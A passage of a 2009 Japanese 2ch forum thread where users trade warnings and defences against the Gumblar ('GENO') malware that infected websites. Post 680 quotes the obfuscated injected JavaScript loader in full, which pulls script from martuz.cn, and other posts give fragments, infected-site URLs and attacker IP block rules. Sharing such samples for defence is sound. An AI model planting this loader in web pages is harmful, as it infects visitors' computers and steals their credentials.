552 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 11:49:37 ]
てかウイルス仕掛けたり作ったりしてるの日本人なの?

553 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:49:39 ]
534の人気に嫉妬

554 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:50:24 ]
dフル初の感染者確認!

555 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:50:35 ]
なんぼ週アスと手を組んで安売りセールやってももうGENOのサイト見に行きたくねえ
一度もないけど

556 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:51:13 ]
HashTab Shell Extension お薦め
ttp://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html


557 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:51:28 ]
>>553
genoの社員じゃねーのw

558 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:51:31 ]
>>545
いやこの間の更新には入ってない

559 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:51:34 ]
やべぇ。神戸で豚感染、国内初だって。
もう、何もかも終わった。

560 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:51:47 ]
hxxp://www.livmail.com/3others-page/janet/tokusen/index.htm
見てきた、しっかりscript埋め込まれてる罠
<script language=javascript><!--
(function(){var UkRR='%';var WdBp=('v&61r&2・・・・・・・・・



561 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:51:54 ]
リアルでも感染確定\(^o^)/

562 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:52:01 ]
VISTAなら大丈夫って本当?
HPだけど、4月7日に踏んだときに謎のCPU使用率UP現象があったんだけど。
再起動したら起動できなくなるとかはなかったけど。

563 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 11:52:19 ]
>>555
お気に入りから消した
対策してあるけどさすがにカード使う気にも
住所入れる気にもならないな・・・

それでも安売りメール送ってくる
解除したいけどサイト踏みたくないw

564 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:52:25 ]
豚インフルきちゃったな

565 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:53:03 ]
>>518
XPにそれインストールして>>524を開いたら、真っ赤になった!
まじ、やべーよ!!

566 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:53:02 ]
さっきGENOにアクセスしたらつながらなかったんだけど大丈夫かな
こわいなぁ

567 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:53:04 ]
>>549
亜種までかはわからないけど・・・

568 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:53:23 ]
タイミングも悪いよなー
豚インフル来ちゃったし、これで余計にマスコミに取り上げられる機会が…orz

569 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:53:56 ]
524踏んじゃったけど大丈夫…?

570 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:54:30 ]
踏んじゃったけど大丈夫?って聞くなら最初から踏むなよ



571 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:02 ]
>>539の対処でNoScript入れても許可してるサイトが感染してたら意味ないよな?
最近youtubeやニコ動ですら怖くなってるわ

572 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:05 ]
神戸在住の俺\(^o^)/ オワタ

573 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:07 ]
>>569
だめ

574 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:10 ]
>>568
マスゴミだってPCつかってるから自分が感染すれば注目してくれるかもよ

575 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:15 ]
豚インフルの感染者って地元なんだよね・・・

576 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:15 ]
877 名前: geno [sage] 投稿日: 2009/05/16(土) 11:50:08 ID:bcj3KvYq0
これかわからないけど東方の超大手サイトからavast!でウイルス反応出るんだが
東方自ジャンルじゃないからどのスレいけばいいのかよくわかんね…
とりあえずサイト管理人にメールするしか出来ないのかね
こういうときは



これは・・・

577 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:31 ]
>>524
> 感染サイト
> hxxp://expss.main.jp/expss2/2005/07/
ここも
function(TitRT){var H5h='%';var B4mN=('.76ar.20a.3d.22



578 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:55:57 ]
リアルでもネットでもウィルス流行wwww
何事だよ

579 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:56:18 ]
某サイトで見たんですがfirefoxの
Adblock Plusのフィルタリストに

*/94.247.[2-3].[0-255]/*
*/94.229.[64-65].[0-255]/*

を追加するのは効果あるんですか?

580 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 11:56:36 ]
524は感染サイトを紹介しているまとめサイトだと思って踏んじゃったんだよー



581 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:56:59 ]
>>562
VISTAでも多分ヤバイ

582 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:57:01 ]
>>549
亜種は検出しないよ

583 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:57:09 ]
>>569
狐かchromeで見たの?
あとテンプレの通りに確認してみ?
念のためにavastさんでチェックな
最後に神社でお百度参りするんだ

584 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:58:21 ]
VISTAって、今のところままだ感染報告来てないよな?
これから亜種が出てくるだろうが


ま、俺のところ98なんで関係ないんですがね

585 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:58:25 ]
>>581
マジか。
まぁ、今はクリーンインスコして快適にはなったんだけどね。
色々なとこで「VISTAなら大丈夫」とか言ってるのはなんなんだろ

586 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:59:04 ]
おい、VISTAもあぶないのかよ。ほんまかいな。どうなってんだよ

587 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:59:50 ]
しかけてる奴もvista大丈夫大丈夫言われるとやりたくなっちゃうだろ

588 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:00:00 ]
524はあぼーん推奨だろ

589 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:00:34 ]
東方同人サイト超大手、感染報告来たね

これはニコオタ全滅フラグ

590 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:01:14 ]
Vistaでも感染シマス



591 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:01:15 ]
>>546
Google次第だろうな

592 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:01:31 ]
>>519
工エエェェ(´д`)ェェエエ工工
ああああああああああああああああああああああああああああああああああ

593 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:02:12 ]
熱い展開になってきたな

594 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:02:29 ]
>>585
過去ログによると
GENOのサイトがお詫び文だか弁明ページだかで
そういうデマを流したらしい。

595 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:02:45 ]
>>487
Meの場合、そもそも存在しないんでは?

596 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:02:46 ]
これは日本\(^o^)/

597 名前:594 [2009/05/16(土) 12:03:36 ]
違うわ思い違いだわ。
寝惚けてるので落ちるゴメン

598 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:04:08 ]
>>533
そのリンク先、
疑わしきURLはクリックしなければ、大丈夫って受け取るヤツがいそう。
全て対策したうえで、かつ 疑わしきリンクをクリックしない にしてほしいな。


あと、次スレのテンプレでは そろそろ >>2は止めたほうがイイと思う。
もう、対策されたReaderが出ているんだし。
やむを得ず 古いバージョン(9.1以前)を使う状況にいるヤツは こんなスレに来ないはず。
全員アップデートしろ! だが、また脆弱性みつかるかもしれないから、JavaScript切っておけ でよかろうよ。

FirefoxにNoScript入れて、なおかつプラグインを全部切った方がいいよ。
NoScriptは初期設定がどうだったか忘れたけど、トップサイトは許可とかいう「ザル化設定」が沢山あるから。
Flashみられなくたって、PDFがブラウザで読めなくたって、いつ来るか分からない新型亜種に感染するよりいいだろ。

599 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:04:16 ]
これはひどいなw

detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325728558

600 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:04:42 ]
Win系なら全部やばいって事でいいだろ
用心に越した事はないぞ?



601 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:04:46 ]
怪しいサイトはjavascriptを無効にして踏むこと

602 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:05:25 ]
>>600
つまり、Linuxにしろと?

603 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:05:28 ]
とりあえず、面白半分で危険なサイトのURL(に近い)を貼るのは止めにしません?

ウィルス貼ってるのと同じようなものだし、
今から知識を得て対策しようとしてる人がカワイソだよ

604 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:05:30 ]
>>596
なあにが日本万歳だこの糞野郎

605 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:05:36 ]
avastがうるせーと思ったけど、調べてみたらなるほど。やるじゃん
いつもJS切ってるから大丈夫だったけど、警告はされるのね

606 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:06:04 ]
>>565
オイラもXPだから入れてやってみよう

607 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:06:12 ]
>>592
少なくとも改竄されたhtml踏んでも反応はしないし、恐らくだがpdf読み込んだ後も反応しなかった。
その時のウイルス自体には対応しただろうけど、htmlの改竄が見抜けない以上、すり抜けは続くんじゃないかな。
まあ無料版の8 Personalってのもあると思うけど。

608 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:06:33 ]
この板だとネタなのかマジレスなのか分からん奴多いんだよな

609 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:06:47 ]
>>602
そのうちMACとか全部に感染する亜種がでるかもな

610 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:07:59 ]
>>599
ワロタwww
Genoウィルスが問題ないってw



611 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:08:00 ]
Googleでも感染するってある意味最強じゃね?

612 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:08:31 ]
ttp://www.virustotal.com/analisis/ed413980519f79ed84cc322b5cd48765
ttp://www.virscan.org/report/6e71de22a350a54d142f3b66606814f8.html

613 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:09:12 ]
>>611
グーグルのサーバーにも感染してるの?
ってことは、ググったらアウト?

614 名前:600 mailto:sage [2009/05/16(土) 12:09:13 ]
>>602
踏んでしまったのですが、○○ですが大丈夫でしょうか?(○○はOS)
って質問するよりログ読んだ方が速いだろと

615 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:09:14 ]
ぐぐってリンク開かなければ大丈夫なんじゃなくて
検索使うだけでアウアウ?

616 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:10:43 ]
>>524のサイトは難読化されたコードが24個も埋め込まれているw

617 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:10:49 ]
俺のブラウザOPERAなんだけど…firefoxみたいに対策できないの?

618 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:11:54 ]
凄いアホな質問していいか?
サイトでの感染があるのは分かったけど、感染したパソコンから送られた『メール』で
感染する可能性は?

619 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:11:57 ]
Lunascapeのscript、Java無効設定じゃ危ない?

620 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:12:05 ]
>>603
みんなネットサーフィンで知らずに踏んでると思われ



621 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:12:06 ]
【新型インフル】 "ついに発生" 渡航歴ない高校生、新型インフルエンザと確定。どうやって感染?…他に17人の体調不良者も
tsushima.2ch.net/test/read.cgi/newsplus/1242442362/

622 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:12:11 ]
>>607
地道にNoScriptでがんばろうと思います。

623 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:12:09 ]
最初に作った犯人を逮捕することはできないの?
その犯人に拡大の仕組みを自白させれば解決するんじゃないの?

624 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:12:16 ]
>>617
F12キー押してJavaScriptとプラグインのチェックを外せばおk

625 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:13:05 ]
このウイルスは広める能力はないから

626 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:13:21 ]
>>620
普通に法律の解説サイトとかにウイルス紛れ込んでいるからな・・・
アダルトサイトとか違法DLサイトなら分かるんだが・・・

627 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:14:18 ]
>>624
それだと安心できるな
しかしインターネットがつまらないものになりそうだ

628 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:14:47 ]
>>623
東欧とかロシアとか中国じゃないのか?本拠地は
そいつらをすぐに逮捕できると思うか?

629 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:15:12 ]
524のサイト
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。このウェブサイトにアクセスすると
コンピュータに損害を与える可能性があります。

5397 個のドメインを感染させています。

増えてる ((;゜Д゜)ガクガクブルブル


630 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:15:25 ]
国家が匿うな



631 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:15:29 ]
XPなんだけど、sqlsodbc.chmのサイズが変。ハッシュもあわなかった。
cmd、regedit、再起動することはできる

ニフティのスキャンは、ロックのかかったファイルがいっぱい出てきた以外には、何もでなかった

sqlsodbc.chmのフォルダが圧縮されてる(青文字で表示されてる)のは何か関係ある?
それとも亜種なだけ?

632 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:15:34 ]
NoScriptでGoogle開いてもJS禁止されてるね
Googleが危険なサイトだとみなされている翔子です

633 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:15:52 ]
>>624
やってくる
ありがとう!

634 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:15:59 ]
>>627
サイトごとの編集を使うってのあるが、結局許可したサイトが汚染されたら意味無し
まあ俺はyoutubeとかを許可しているけど

635 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:16:25 ]
俺のPCにはsqlsodbc.chmが存在しないからかなり楽観視してるけど
そんなの関係ねえのかな?

636 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:18:03 ]
>>635
>>4
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、
>この方法に完全に頼るのは危険かもしれません。

637 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:18:31 ]
Noscriptなら許可したサイトを開いても94.247.2.195は許可されないから問題ないんじゃないの?

638 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:18:49 ]
>>636
くそがああああああああああああ
俺を早く安心させてくれ

639 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:19:02 ]
裁判員に選ばれたらウイルス製作者を死刑にしようと思う。

640 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:20:15 ]
>>631
数回仮想環境で感染してみたけどcmdとregedit普通に動作出来たり
再度感染すると出来なかったりバラバラみたい



641 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:20:27 ]
>>638
回線をハサミで切ったらおk

642 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:20:32 ]
NO scriptなんて甘っちょろいことしないでjava全部無効でいいだろ
you tubeとか見れなくなるけどさ

643 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:21:02 ]
>>631
SQL ServerやMSDE、Visual Studio等を入れるとバージョンによってサイズ変わるよ。
ファイルの更新日付が最近じゃなければ、sqlsodbc.chmそのものはそれほど
気にする必要がない。他の症状が何もないなら気にしなくていいと思う。

644 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:21:09 ]
javascriptじゃない感染方法もあるんじゃないの?

645 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:21:36 ]
FirefoxでNoScript入れて無くてもJavaScriptを有効にしてなければ平気?

646 名前:600 mailto:sage [2009/05/16(土) 12:21:39 ]
おいお前らJavaScriptを略すならjsにしろ
Javaと区別つかねーだろうが

647 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:22:07 ]
>>613
>>615
さっきやって分かった。FirefoxはデフォルトだとGoogleのリンク先先読み設定あるから、
about:config で network.prefetch-next を falseにしとけ。

648 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:22:09 ]
捕まえたやつに数億賞金出せばおもしろいことになりそうだな

649 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:22:40 ]
>>632
自分で許可しなければ、全て禁止ですwww

650 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:22:43 ]
>>640
共通項ってなかった?



651 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:23:28 ]
はぁ、おっぱい見てぇ

652 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:23:35 ]
>>647
これ、さっきのりぶメールって何のサイトなんだろうと思ってぐぐったら
検索結果が表示された瞬間Avast!が吼えまくったんで気づいたんだ。

653 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:23:36 ]
>>632
いやお前のNoScriptの設定でgoogle.co.jpかgoogle.comを禁止してるだけだろ
Noscript入れたばかりでそうなってるかもしれないけど

654 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:23:41 ]
FireFoxにNoScriptでウイルス回避しても
行きつけのサイトをスクリプト許可していたら危険URLに飛ばされるだろうし
上級者なら気づくが超初心者ならスクリプトの許可をしそうでやばいな

655 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:23:50 ]
>>635
それにGENOだけじゃなく普通の新種ウイルスにも注意するべきだろw

656 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:24:07 ]
>>637
どういうこと?詳しく

657 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:25:00 ]
631です

sqlサーバー入ってる
…けどファイルの最終更新日が、同人の方で感染報告してる人たちと同じみたいなのでやっぱ怪しいわ

658 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:25:02 ]
>>647
日本語で頼む

659 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:25:22 ]
>>654
VistaのUACも同じだろな
うっかり「OK」をクリックしそうだ

660 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:25:32 ]
>>644
objectタグ使うとかありうるよな。
ftpアカウント取っちゃってるんだから、新たなおいしい脆弱性が発見されるまで
発症しないで潜んでるなんていうのもありうる。



661 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:25:49 ]
>>647
ありがと!

662 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:25:54 ]
>>527
作ってお願い。

663 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:25:57 ]
>>647
>>652
なるほど
気を付ける

664 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:26:24 ]
一番はやっぱりプラグインの無効化だろう

665 名前:名無しさん@ゴーゴーゴーゴー! mailto:sage [2009/05/16(土) 12:27:15 ]
Adobe Flash Player を最新版にしたらおかしくなるんだけど…いろいろ見れなくなる
これってこのウイルスのせいなの?
もう一か月以上続いてるんですけど・・・;

666 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:27:36 ]
>>647
してやったぞ
ありがたく思え

667 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:28:19 ]
>>649,653
なんか俺が馬鹿みたいじゃん^^;

668 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:28:23 ]
>>665
それは普通に更新したらおかしくなる不具合でてる
完全に削除してから入れると良い

669 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:28:25 ]
緊張感でチンポしゃぶりたくなってきた

670 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:29:37 ]
>>647
変更したありがとう



671 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:29:44 ]
何かもうやること多くてやんなっちゃうな
感染してもおkなPC用意して見た方が楽かもしれん

672 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:30:06 ]
FIREFOXで安心が買えるのか?
心配になってきた…

673 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:30:15 ]
>>671
そこでLinuxですよ旦那!!

674 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:30:31 ]
>>656
noscriptはjsを個別にjsのドメインで許可不許可できる
今までみたいなjs全許可不許可とは全くの別物

675 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:31:02 ]
感染してるかもしれないサイトを、更新チェッカー(WWWC)でチェックしても大丈夫ってことだよね。

今のところ不気味なことは起きてないし。

676 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:31:14 ]
>>647のやり方誰か教えてくれ

677 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:31:24 ]
95.129.144.0/23 全焼きしておこう

678 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:32:20 ]
>>647
ありがとう、勉強になった

679 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:32:43 ]
>>671
上級者も根を上げそうですか

680 名前:コピペ [2009/05/16(土) 12:33:00 ]
ttp://www3.atword.jp/gnome/

*** 緊急 ***

gumblar.cn 95.129.145.58 の代わり

martuz.cn
95.129.145.58

IP addr は変更されていませんが gumblar.cn のドメインベースのみでブロックしている方は注意してください。

−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−

>>560
このサイトは既に martuz.cn になっている。

(function(){var UkRR='%';var WdBp=('var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j " a "Major" b+a+"Minor" b a "Build" b "j;");
document.write("<script src=//martu" "z.cn/vid/?id="+j "><\/script>");}').replace(//g,UkRR);eval(unescape(WdBp))})();



681 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:33:03 ]
ジェノサイドウイルスか

682 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:33:20 ]
通販サイトでサイズ表を見ようとしたらエラーになるんだがやられたのかな

>モール/ストアでは現在問題が発生しています。
>あとでもう一度試してください。
>コマンド構造の失敗
>(CMN0950E)
>コマンドを完了できません。コマンド構文が正しくないか、システムが必要とするパラメーターが渡されていません。

わりと大手のところなんだがこんなんじゃ迂闊にネットできないな

683 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:33:24 ]
>>665
www.adobe.com/jp/shockwave/download/alternates/
ここからアンインストーラを落として、アンインスコ→再インスコし直してごらん

684 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:33:53 ]
>>676
「about:config」でググれ。

でも、ググる前に、about:configでnetwork.prefetch-nextを無効にしておけよ。


685 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:33:58 ]
>>676
火狐のロケーションバーにabout:config 入れろ

686 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:34:15 ]
>>676
Firefoxのアドレス欄にabout:configってコピペ、Enter、
ずらずらーーーーーってアルファべ順に出てくる項目の中から
network.prefetch-nextを探して洗濯、右クリでtrueをfalseに変更

687 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:34:23 ]
>>684
クソワロタwwww

688 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:34:45 ]
>>682
名前出そうよ
隠してる場合じゃないだろ

689 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:35:08 ]
FirefoxのURLバーに「about:config」と入力する。※警告が出てきても大丈夫
上の検索で「network.prefetch-next」と入力して、出てきた値がtrueだったらダブルクリック→falseにする。
あとFasterfoxだっけか?あれの先読みも切った方がいいかな

690 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:35:16 ]
>>682
ニッセンとかムトウとか?



691 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:35:38 ]
>>686
network.prefetch-nextを探してとかクソだるいから、ずらずら出てるとこの上の
フィルタってとこにまんま「network.prefetch-next」入れろ。したらFirefoxが探して
くれるから。

692 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:36:10 ]
>>685
トンクス

693 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:36:19 ]
Genoウイルスが更に凶悪化したら
上級者のお前らでも対応できるのか!

まあ無理と思うがなー

694 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:36:34 ]
>>676じゃないが怖くてググれなかったから助かったwwwありがとうww


695 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:36:37 ]
>>682
そうだね、あまりにも大手なら一部伏字でも名前だした方がいいかも

696 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:37:22 ]
アマゾンか

697 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:37:44 ]
おいおい。感染拡大してんの?

698 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:37:49 ]
>>647
ありがとう

しかしこれをしたらリンクに飛ぶのが面倒になるんだな…
感染するよりはましだが

699 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:38:04 ]
>>628
この犯人はただのお騒がせ目的じゃなくて
集めたパスワードとかの情報で悪い金儲けを企んでいるわけでしょ?
そのラインから捕まえられないのかなあ?

700 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:38:16 ]
konozama陥落か



701 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:38:34 ]
>>697
この伸び方、おもろいだろ?

702 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:38:34 ]
加速度的に汚染が進みそうな予感
てか進んでるのか

703 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:01 ]
>>676
Firefoxの先読みをOFFにするとインターネットが遅くなるがガマンしろな!

704 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:07 ]
>>693
俺、友達にスパーハカーがいるから何とかしてもらう

705 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:16 ]
>>698
体感速度そんな変わらなかったけどなあ。

706 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:28 ]
Vistaユーザー用に C:\Windows\Help\mui以下のディレクトリにsqlsodbc.chmが存在する
ってあったんだが更新日が2006年でサイズが50KB 前後なんだよね
これってセーフでいいのかな

707 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:29 ]
しかし、なんで同人系は感染率高いんだ?
動画サイト経由で食らったんかな?

708 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:29 ]
falseに変えたらそのままタブ閉じちゃえばいいの?
設定ページからの戻り方が分からない

709 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:52 ]
アマゾン陥落?
嘘だよな?

710 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:39:58 ]
>>708
閉じていい。



711 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:40:04 ]
今朝、他の掲示板はどうかと思ってアホーの掲示板でウィルスで探してみた
見なければ良かった・・・orz

セキュリティーソフトも入れていないのが多数
それで言い訳は初心者wwwwwwww
拡散するだろうなと思って恐ろしくなったよ


712 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:40:07 ]
>>647設定したけど遅くなったりはしなかったんだぜ

713 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:40:31 ]
>>704
友達のスパハカーのパソコンもGENOウイルスに感染している悪寒w

714 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:40:39 ]
ええええ、アマゾン??利用しまくってるのに…
もう、怖くてネットサーフィンできないな

715 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:40:41 ]
タスクマネージャー見たらASDUtility.exeが起動してた
